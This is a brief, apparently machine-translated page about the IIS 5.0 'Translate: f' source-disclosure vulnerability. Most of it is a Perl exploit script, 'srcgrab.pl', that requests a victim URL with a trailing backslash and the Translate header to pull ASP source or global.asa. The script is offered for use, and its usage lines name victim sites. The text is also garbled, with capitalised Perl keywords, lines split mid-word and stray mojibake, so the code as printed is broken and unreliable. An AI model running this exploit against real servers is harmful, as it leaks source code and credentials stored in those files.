Iis|iis iis5 ASP Leaks
When IIS 5.0 receives an HTTP request for a specially formatted header (TRANSLATE:F), your
When the end contains a special character, IIS uses the wrong handling to cause the file source code to leak.
The following code is only used to test and investigate this vulnerability, if you use it in an improper way, please result from
Negative
#!/usr/bin/perl
# Expl0it by smiler@vxd.org
# tested with sucess against IIS 5.0. Maybe It works against IIS 4.0 u
Sing a shared drive but I Haven 磘 tested it yet.
# Get the source code a script from the ' server using this exploit
.
# This code is written after the Daniel Docekal brought this issue in Bug
TraQ.
# Cheers 351 and Fractalg:)
if (not $ARGV [0]) {
Print qq~
GEEE it 磗 running!! Kewl:)))
Usage:srcgrab.pl Example Usage:srcgrab.pl http://www.victimsite.co
M/global.asa
U can also save the retrieved file using:srcgrab.pl http://www.victi
m.com/default.asp > File_to_save
~; Exit;}
$victimurl = $ARGV [0];
# Create a User Agent object
Use lwp::useragent;
$ua = new Lwp::useragent;
# Create a request
My $req = The new http::request get => $victimurl. '\\'; # This is the BA
Ckslash at the URL;)
$req->content_type (' application/x-www-form-urlencoded ');
$req->content_type (' text/html ');
$req->header (Translate => ' f '); # This is the famous translate header
:))
$req->content (' match=www&errors=0 ');
# Pass request to the user agent and get a response back
My $res = $ua->request ($req);
# Check The outcome of the response
if ($res->is_success) {
Print $res->content;
} else {
Print $res->error_as_html;
}
